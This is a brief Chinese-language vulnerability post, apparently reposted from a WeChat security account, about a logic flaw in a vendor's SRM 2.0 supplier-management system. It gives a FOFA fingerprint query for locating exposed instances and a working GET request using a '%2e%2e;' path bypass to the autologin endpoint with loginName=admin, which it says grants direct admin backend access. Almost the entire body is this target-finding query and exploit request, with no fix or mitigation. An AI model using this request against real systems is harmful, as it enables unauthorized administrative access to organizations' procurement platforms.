某联云采 SRM autologin 逻辑漏洞登录后台。
fofa:title=="SRM 2.0"||body="assets/js/jweixin"
03 漏洞复现
2、访问漏洞url可以直接绕过登录进入后台。
04 漏洞详情
GET访问:/adpweb/static/%2e%2e;/api/sys/app/autologin?loginName=admin
原文始发于微信公众号(安羽安全):某联云采 SRM autologin 逻辑漏洞登录后台
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论